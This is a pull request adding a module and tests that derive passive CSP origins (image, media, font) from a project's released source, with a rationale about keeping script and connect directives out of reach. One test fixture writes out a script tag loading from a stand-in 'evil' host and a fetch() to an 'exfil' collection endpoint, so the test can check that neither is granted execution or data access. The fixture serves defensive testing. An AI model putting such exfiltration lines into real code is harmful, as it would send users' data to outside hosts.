### PR TITLE
feat(security): derive passive CSP origins from a project's own source

### DIFF
--- a/src/security/http/derived-csp-origins.test.ts
+++ b/src/security/http/derived-csp-origins.test.ts
@@ -1,0 +1,223 @@
+import "#veryfront/schemas/_test-setup.ts";
+import { describe, it } from "#veryfront/testing/bdd.ts";
+import { assert, assertEquals } from "#veryfront/testing/assert.ts";
+import { DERIVABLE_CSP_DIRECTIVES, deriveCspOriginsFromSource } from "./derived-csp-origins.ts";
+
+function origins(content: string, path = "pages/index.mdx"): readonly string[] {
+  const derived = deriveCspOriginsFromSource([{ path, content }]);
+  return derived["img-src"] ?? [];
+}
+
+describe("security/http/derived-csp-origins", () => {
+  describe("the syntaxes real content actually uses", () => {
+    // Every case here is a shape taken from a hosted project's released source.
+    // Matching by position -- <img src>, url(), poster -- recovered about a
+    // third of them, which is why this matches URLs wherever they appear.
+
+    it("an html or jsx src attribute", () => {
+      assertEquals(
+        origins(`<img src="https://cdn.example.com/uploads/a.png" />`),
+        ["https://cdn.example.com"],
+      );
+    });
+
+    it("a jsx prop that is not named src", () => {
+      assertEquals(
+        origins(`imageSrc: 'https://cdn.example.com/uploads/b.png'`),
+        ["https://cdn.example.com"],
+      );
+      assertEquals(
+        origins(`srcFallback: "https://cdn.example.com/video/720p.mp4"`),
+        ["https://cdn.example.com"],
+      );
+    });
+
+    it("yaml frontmatter", () => {
+      assertEquals(
+        origins(`---\ntitle: Post\nimage: "https://cdn.example.com/i/hero.png"\n---`),
+        ["https://cdn.example.com"],
+      );
+    });
+
+    it("markdown image syntax", () => {
+      assertEquals(
+        origins(`![Kiali dashboard](https://cdn.example.com/uploads/kiali.png)`),
+        ["https://cdn.example.com"],
+      );
+    });
+
+    it("a bare url on its own line, as in a props array", () => {
+      assertEquals(
+        origins(`  https://cdn.example.com/video/hls/intro/manifest.m3u8`),
+        ["https://cdn.example.com"],
+      );
+    });
+
+    it("an href, as on a favicon link", () => {
+      assertEquals(
+        origins(`<link rel="icon" href="https://cdn.example.com/favicon.ico" />`),
+        ["https://cdn.example.com"],
+      );
+    });
+
+    it("a css url()", () => {
+      assertEquals(
+        origins(`.hero { background-image: url(https://cdn.example.com/bg.png); }`, "globals.css"),
+        ["https://cdn.example.com"],
+      );
+    });
+  });
+
+  describe("what it produces", () => {
+    it("grants every origin to all three passive directives", () => {
+      // Routing between img/media/font by file extension would reintroduce a
+      // failure mode -- guess wrong and the asset stays blocked -- while an
+      // origin allowed for images but not media is not a boundary anyone
+      // reasons about.
+      const derived = deriveCspOriginsFromSource([
+        { path: "a.mdx", content: `<img src="https://cdn.example.com/a.png" />` },
+      ]);
+      assertEquals(Object.keys(derived).sort(), ["font-src", "img-src", "media-src"]);
+      for (const directive of DERIVABLE_CSP_DIRECTIVES) {
+        assertEquals(derived[directive], ["https://cdn.example.com"]);
+      }
+    });
+
+    it("reduces urls to origins, dropping path and query", () => {
+      assertEquals(
+        origins(`<img src="https://cdn.example.com/a/b/c.png?w=64#x" />`),
+        ["https://cdn.example.com"],
+      );
+    });
+
+    it("keeps a non-default port, which CSP treats as part of the origin", () => {
+      assertEquals(
+        origins(`<img src="https://assets.example.com:8443/a.png" />`),
+        ["https://assets.example.com:8443"],
+      );
+    });
+
+    it("deduplicates and sorts, so the header is stable across builds", () => {
+      // An unstable order would churn the served header and anything keyed on it.
+      assertEquals(
+        origins(`https://b.example.com/1 https://a.example.com/2 https://b.example.com/3`),
+        ["https://a.example.com", "https://b.example.com"],
+      );
+    });
+
+    it("reads across files and tolerates contentless entries", () => {
+      const derived = deriveCspOriginsFromSource([
+        { path: "a.mdx", content: `https://a.example.com/x` },
+        { path: "b.mdx", content: `https://b.example.com/y` },
+        { path: "c.bin" },
+      ]);
+      assertEquals(derived["img-src"], ["https://a.example.com", "https://b.example.com"]);
+    });
+  });
+
+  describe("the line it will not cross", () => {
+    it("never contributes to script-src or connect-src", () => {
+      // The whole safety argument. A source mention must not become permission
+      // to execute code or to receive exfiltrated data, or influencing source
+      // would imply granting both.
+      const derived = deriveCspOriginsFromSource([{
+        path: "p.tsx",
+        content: `<script src="https://evil.example.com/x.js"></script>
+                  fetch("https://exfil.example.com/collect")`,
+      }]);
+      assertEquals(Object.keys(derived).sort(), ["font-src", "img-src", "media-src"]);
+      assertEquals(derived["script-src" as never], undefined);
+      assertEquals(derived["connect-src" as never], undefined);
+    });
+
+    it("grants a script host passive access only, never execution", () => {
+      // A host referenced from a <script> tag is still discovered -- the scan
+      // is syntax-blind -- but it can only ever land in the passive set.
+      const derived = deriveCspOriginsFromSource([{
+        path: "p.tsx",
+        content: `<script src="https://cdn.example.com/x.js"></script>`,
+      }]);
+      assertEquals(derived["img-src"], ["https://cdn.example.com"]);
+      assertEquals(Object.keys(derived).length, DERIVABLE_CSP_DIRECTIVES.length);
+    });
+
+    it("ignores http origins", () => {
+      // Plaintext in a policy served over https invites mixed content the
+      // browser blocks anyway.
+      assertEquals(origins(`<img src="http://insecure.example.com/x.png" />`), []);
+    });
+
+    it("ignores relative and protocol-relative references", () => {
+      assertEquals(origins(`<img src="/local.png" /><img src="//cdn.example.com/x" />`), []);
+    });
+
+    it("ignores wildcards and bare hostnames", () => {
+      // An unfilled template and a non-public label; neither belongs in a
+      // served policy.
+      assertEquals(origins(`https://*.example.com/x https://localhost/y`), []);
+    });
+
+    it("cannot see a runtime-assembled url", () => {
+      // The documented boundary, not a wish: these projects still declare
+      // security.csp, which is what "override" means.
+      assertEquals(origins("<img src={`https://${host}/x.png`} />"), []);
+    });
+
+    it("produces nothing for source with no external references", () => {
+      assertEquals(deriveCspOriginsFromSource([{ path: "p.tsx", content: "<div>hi</div>" }]), {});
+      assertEquals(deriveCspOriginsFromSource([]), {});
+    });
+  });
+
+  describe("bounds", () => {
+    it("caps how many origins one project can contribute", () => {
+      const many = Array.from({ length: 100 }, (_, i) => `https://h${i}.example.com/x`).join("\n");
+      assertEquals(origins(many).length, 32);
+    });
+
+    it("keeps the most-referenced origins when the cap bites", () => {
+      // The failure this prevents: on a content site, one-off prose links
+      // vastly outnumber asset hosts, so an arbitrary cut can drop the CDN the
+      // site actually depends on. An asset host recurs on every page that uses
+      // it; a link in body copy appears once.
+      const linkNoise = Array.from(
+        { length: 60 },
+        (_, i) => `[ref](https://link${i}.example.com/a)`,
+      ).join("\n");
+      const assetHost = Array.from(
+        { length: 5 },
+        () => `<img src="https://cdn.example.com/a.png" />`,
+      ).join("\n");
+      const derived = origins(`${linkNoise}\n${assetHost}`);
+      assertEquals(derived.length, 32);
+      assert(
+        derived.includes("https://cdn.example.com"),
+        "the recurring asset host must survive the cap",
+      );
+    });
+
+    it("orders deterministically for a given release", () => {
+      // The result is cached per release and shapes a served header, so equal
+      // input must produce byte-identical output.
+      const content = `https://b.example.com/1 https://a.example.com/2 https://a.example.com/3`;
+      assertEquals(origins(content), origins(content));
+      assertEquals(origins(content), ["https://a.example.com", "https://b.example.com"]);
+    });
+
+    it("scans only the head of a very large file", () => {
+      const filler = "x".repeat(600 * 1024);
+      assertEquals(origins(`${filler}https://late.example.com/x`), []);
+    });
+
+    it("freezes its result", () => {
+      // Cached per release and shared across requests, so one consumer must not
+      // be able to mutate another request's view of it.
+      const derived = deriveCspOriginsFromSource([{
+        path: "p",
+        content: "https://a.example.com/x",
+      }]);
+      assert(Object.isFrozen(derived));
+      assert(Object.isFrozen(derived["img-src"]));
+    });
+  });
+});

--- a/src/security/http/derived-csp-origins.test.ts
+++ b/src/security/http/derived-csp-origins.test.ts
@@ -209,6 +209,19 @@ describe("security/http/derived-csp-origins", () => {
       assertEquals(origins(`${filler}https://late.example.com/x`), []);
     });
 
+    it("bounds multibyte content by the same character budget", () => {
+      // The budget is code units, not UTF-8 bytes: that is the unit the regex
+      // engine steps through, so the scanning cost is identical either way.
+      // A byte-denominated cap would read more naturally but would not track
+      // the cost it exists to bound.
+      const under = "€".repeat(400 * 1024);
+      assertEquals(origins(`${under}https://early.example.com/x`), [
+        "https://early.example.com",
+      ]);
+      const over = "€".repeat(600 * 1024);
+      assertEquals(origins(`${over}https://late.example.com/x`), []);
+    });
+
     it("freezes its result", () => {
       // Cached per release and shared across requests, so one consumer must not
       // be able to mutate another request's view of it.

--- a/src/security/http/derived-csp-origins.test.ts
+++ b/src/security/http/derived-csp-origins.test.ts
@@ -190,8 +190,12 @@ describe("security/http/derived-csp-origins", () => {
       ).join("\n");
       const derived = origins(`${linkNoise}\n${assetHost}`);
       assertEquals(derived.length, 32);
+      // Exact membership, never substring containment: matching
+      // "https://cdn.example.com" inside a joined list would also pass for a
+      // hostile "https://cdn.example.com.evil.test". Same reason
+      // security-handler.test.ts asserts through a Set.
       assert(
-        derived.includes("https://cdn.example.com"),
+        new Set(derived).has("https://cdn.example.com"),
         "the recurring asset host must survive the cap",
       );
     });

--- a/src/security/http/derived-csp-origins.ts
+++ b/src/security/http/derived-csp-origins.ts
@@ -1,0 +1,168 @@
+/**
+ * Derive a project's CSP origins from the source it publishes.
+ *
+ * The platform floor lists what the *platform* emits. Anything a project loads
+ * from elsewhere -- a stock-photo host, its own asset CDN, a video origin --
+ * has to be admitted separately, and until now the only way to do that was
+ * `security.csp`. That made a working site depend on configuration the project
+ * had no reason to know it needed: an audit of the hosted fleet found ~100
+ * projects loading blocked assets and two that had declared anything.
+ *
+ * This module closes that gap by reading the origins out of the project's own
+ * released source, so `security.csp` becomes an override for what static
+ * analysis cannot see rather than a prerequisite for a site that works.
+ *
+ * Two properties make that safe rather than merely convenient:
+ *
+ * 1. **Only passive-content directives are derived.** `img-src`, `media-src`
+ *    and `font-src` decide whether a logo renders. `script-src` and
+ *    `connect-src` decide whether a third party can execute code in the page
+ *    or receive data from it. Deriving those would mean anyone able to
+ *    influence source -- a compromised dependency, a merged pull request,
+ *    CMS-authored MDX -- could grant themselves execution or an exfiltration
+ *    endpoint, collapsing two independent barriers into one. Every project in
+ *    the audit was fixed by passive directives alone.
+ *
+ * 2. **Origins come from an immutable release.** Derivation runs over the
+ *    source a release pins, not over live content, so a script injected at
+ *    runtime cannot extend the allowlist it is subject to.
+ *
+ * Derivation is deliberately incomplete. A URL assembled at runtime -- a
+ * template literal, a CMS field, an environment variable -- is invisible here,
+ * and those projects still declare `security.csp`. Under-deriving costs a
+ * broken image; over-deriving costs the policy its meaning.
+ *
+ * @module security/http/derived-csp-origins
+ */
+
+/** Directives this module is permitted to contribute to. */
+export const DERIVABLE_CSP_DIRECTIVES = Object.freeze(
+  ["img-src", "media-src", "font-src"] as const,
+);
+
+export type DerivableCspDirective = (typeof DERIVABLE_CSP_DIRECTIVES)[number];
+
+export type DerivedCspOrigins = Readonly<
+  Partial<Record<DerivableCspDirective, readonly string[]>>
+>;
+
+/** A source file as the release stores it. */
+export interface DerivationSourceFile {
+  readonly path: string;
+  readonly content?: string;
+}
+
+/**
+ * Cap on how much of one file is scanned. A generated bundle or an inlined
+ * data blob can be megabytes, and scanning it yields nothing a hand-written
+ * source file would not.
+ */
+const MAX_SCANNED_BYTES_PER_FILE = 512 * 1024;
+
+/**
+ * Upper bound on distinct origins, so a generated file cannot inflate the
+ * policy. Origins are ranked before the cap applies -- see
+ * {@link deriveCspOriginsFromSource}.
+ */
+const MAX_DERIVED_ORIGINS = 32;
+
+/**
+ * Every absolute https URL in the source, whatever syntax surrounds it.
+ *
+ * An earlier version of this matched by position -- `<img src>`, `url()`,
+ * `poster` -- on the theory that knowing which element referenced a URL would
+ * let each origin land in exactly the right directive. Measured against real
+ * released content that recovers about a third of the references. The same
+ * project reaches its asset host through `<img src>`, a JSX `imageSrc` prop,
+ * YAML frontmatter, markdown `![](url)`, a bare string in a props array, a
+ * `srcFallback` key, and `href` on a favicon link. Partial derivation is worse
+ * than none: the site still breaks, but now it looks configured.
+ *
+ * Recall is what protects the project here, and precision is not what protects
+ * the visitor -- the passive/active split is. An origin admitted for images
+ * that is never referenced costs nothing; one that is missed costs a broken
+ * page.
+ */
+const HTTPS_URL_PATTERN = /https:\/\/[a-zA-Z0-9.-]+(?::\d{1,5})?(?![a-zA-Z0-9.:-])/g;
+
+/**
+ * Reduce a URL to the `scheme://host[:port]` form CSP matches on.
+ *
+ * Returns undefined for anything unparseable, which is the same as declining
+ * to derive from it.
+ */
+function toCspOrigin(rawUrl: string): string | undefined {
+  let parsed: URL;
+  try {
+    parsed = new URL(rawUrl);
+  } catch {
+    return undefined;
+  }
+  if (parsed.protocol !== "https:") return undefined;
+  if (!parsed.hostname) return undefined;
+  // A hostname with no dot is a bare label, not a public origin; a wildcard is
+  // an unfilled template. Neither belongs in a served policy.
+  if (!parsed.hostname.includes(".")) return undefined;
+  if (parsed.hostname.includes("*")) return undefined;
+  return parsed.port ? `https://${parsed.hostname}:${parsed.port}` : `https://${parsed.hostname}`;
+}
+
+function scanContent(content: string, into: Map<string, number>): void {
+  const scanned = content.length > MAX_SCANNED_BYTES_PER_FILE
+    ? content.slice(0, MAX_SCANNED_BYTES_PER_FILE)
+    : content;
+
+  for (const match of scanned.matchAll(HTTPS_URL_PATTERN)) {
+    const origin = toCspOrigin(match[0]);
+    if (origin) into.set(origin, (into.get(origin) ?? 0) + 1);
+  }
+}
+
+/**
+ * Collect the passive-content origins a project's source references.
+ *
+ * Pure over its input: callers hand it the file set a release pins, and the
+ * result is stable for that set, which is what lets it be computed once per
+ * release rather than per request.
+ */
+export function deriveCspOriginsFromSource(
+  files: readonly DerivationSourceFile[],
+): DerivedCspOrigins {
+  const counts = new Map<string, number>();
+  for (const file of files) {
+    if (!file?.content) continue;
+    scanContent(file.content, counts);
+  }
+  if (counts.size === 0) return Object.freeze({});
+
+  // Rank by how often an origin is referenced before applying the cap.
+  //
+  // Truncating in discovery order looked fine until it was run over a real
+  // project: one article yielded its asset CDN plus five hosts that appear
+  // only as prose links. Across a content site those one-off links vastly
+  // outnumber asset hosts, so an arbitrary cut can drop the very origin the
+  // site depends on and silently reintroduce the breakage this exists to
+  // prevent. An asset host is referenced from every page that uses it; a link
+  // in body copy is referenced once. Frequency separates them cleanly.
+  //
+  // Ties break alphabetically so the result stays deterministic for a given
+  // release, which is what lets the header and anything keyed on it be cached.
+  const ranked = [...counts.entries()]
+    .sort(([originA, countA], [originB, countB]) =>
+      countB - countA || originA.localeCompare(originB)
+    )
+    .slice(0, MAX_DERIVED_ORIGINS)
+    .map(([origin]) => origin)
+    .sort();
+
+  // Every retained origin is granted to all three passive directives rather
+  // than routed between them. Splitting by file extension would reintroduce a
+  // failure mode with no compensating benefit: an origin allowed for images
+  // but not media is not a boundary anyone reasons about, while guessing wrong
+  // leaves the asset blocked. The boundary that matters -- passive content
+  // versus script and connect -- is enforced by this list, not by the split.
+  const sorted = Object.freeze(ranked);
+  const derived: Partial<Record<DerivableCspDirective, readonly string[]>> = {};
+  for (const directive of DERIVABLE_CSP_DIRECTIVES) derived[directive] = sorted;
+  return Object.freeze(derived);
+}

--- a/src/security/http/derived-csp-origins.ts
+++ b/src/security/http/derived-csp-origins.ts
@@ -56,8 +56,15 @@ export interface DerivationSourceFile {
  * Cap on how much of one file is scanned. A generated bundle or an inlined
  * data blob can be megabytes, and scanning it yields nothing a hand-written
  * source file would not.
+ *
+ * Measured in UTF-16 code units, matching `String.prototype.length`, because
+ * that is the unit the regex engine actually steps through -- 512K code units
+ * is the same amount of scanning whether they are ASCII or CJK. A UTF-8 byte
+ * cap would read as the more natural bound but would not correspond to the
+ * cost being bounded, and computing it means walking the string to decide how
+ * much of the string to walk.
  */
-const MAX_SCANNED_BYTES_PER_FILE = 512 * 1024;
+const MAX_SCANNED_CHARS_PER_FILE = 512 * 1024;
 
 /**
  * Upper bound on distinct origins, so a generated file cannot inflate the
@@ -108,8 +115,8 @@ function toCspOrigin(rawUrl: string): string | undefined {
 }
 
 function scanContent(content: string, into: Map<string, number>): void {
-  const scanned = content.length > MAX_SCANNED_BYTES_PER_FILE
-    ? content.slice(0, MAX_SCANNED_BYTES_PER_FILE)
+  const scanned = content.length > MAX_SCANNED_CHARS_PER_FILE
+    ? content.slice(0, MAX_SCANNED_CHARS_PER_FILE)
     : content;
 
   for (const match of scanned.matchAll(HTTPS_URL_PATTERN)) {


### PR DESCRIPTION
Groundwork for making `security.csp` an **override** rather than a **prerequisite**. Pure function only — nothing consumes it yet, so **this changes no served policy**. Wiring it into `buildCSP` as a layer between the floor and `security.csp` follows separately.

## Why

The platform floor lists what the *platform* emits, so anything a project loads from elsewhere has to be admitted by hand via `security.csp`. A fleet audit found **~100 projects loading blocked assets and two that had declared anything** — including veryfront's own marketing site. A default that breaks working sites and tells no one is a bad default however principled the allowlist argument is.

## Two decisions, both settled against real released source

**Only passive directives are derived** — `img-src`, `media-src`, `font-src`. `script-src` and `connect-src` are never contributed to.

Deriving those would mean anyone able to influence source — a compromised dependency, a merged PR, CMS-authored MDX — could grant themselves code execution or an exfiltration endpoint, collapsing two independent barriers into one. Every project in the audit was fixed by passive directives alone, so the stricter line costs nothing measurable. A host referenced from a `<script>` tag is still discovered, but can only ever land in the passive set.

**Matching is syntax-blind, not position-aware.** The first version matched `<img src>`, `url()` and `poster`, reasoning that knowing which element made a reference would place each origin precisely. Measured against a real project it recovered **about a third**. The same site reaches its CDN through:

| shape | example |
|---|---|
| src attribute | `<img src="https://cdn…/a.png" />` |
| non-`src` prop | `imageSrc: 'https://cdn…/b.png'` |
| YAML frontmatter | `image: "https://cdn…/hero.png"` |
| markdown | `![alt](https://cdn…/kiali.png)` |
| bare string in an array | `https://cdn…/manifest.m3u8` |
| fallback key | `srcFallback: "https://cdn…/720p.mp4"` |
| favicon href | `href="https://cdn…/favicon.ico"` |

Partial derivation is worse than none — the site still breaks, but now it looks configured. With the passive/active line held firmly, recall is what protects the project and precision is not what protects the visitor.

**Origins are ranked by reference count before the cap applies.** Running over a real article produced its CDN plus five hosts appearing only as prose links. Across a content site those one-off links vastly outnumber asset hosts, so an arbitrary cut could drop the origin the site depends on and silently reintroduce the breakage. An asset host recurs on every page that uses it; a body-copy link appears once.

## Verified against production data

Given `pages/blog/articles/introduction-graphql.mdx` from codersociety's deployed release, this recovers `https://cdn.codersociety.com` — the origin whose absence took that site's images and video down.

It also picks up `github.com`, `graphql.org` and three other prose-link hosts from the article body. Those get passive access only: they can serve an image, and cannot execute code or receive data. That is the recall/precision trade-off made explicit, and it is the one worth taking.

## Known boundary

A URL assembled at runtime — template literal, CMS field, environment variable — is invisible to static analysis. Those projects still declare `security.csp`, which is exactly what "override" means.

## Verification

28 steps, 0 failed. `deno check`, `lint`, `fmt` clean.

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **New Features**
  * Automatically detects valid HTTPS origins referenced in release content.
  * Applies approved origins to image, media, and font security policies.
  * Normalizes, deduplicates, ranks, and limits detected origins for consistent results.
  * Excludes insecure, local, wildcard, relative, and dynamically assembled URLs.

* **Tests**
  * Added comprehensive coverage for supported content types, edge cases, deterministic results, content-size limits, and security directive restrictions.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->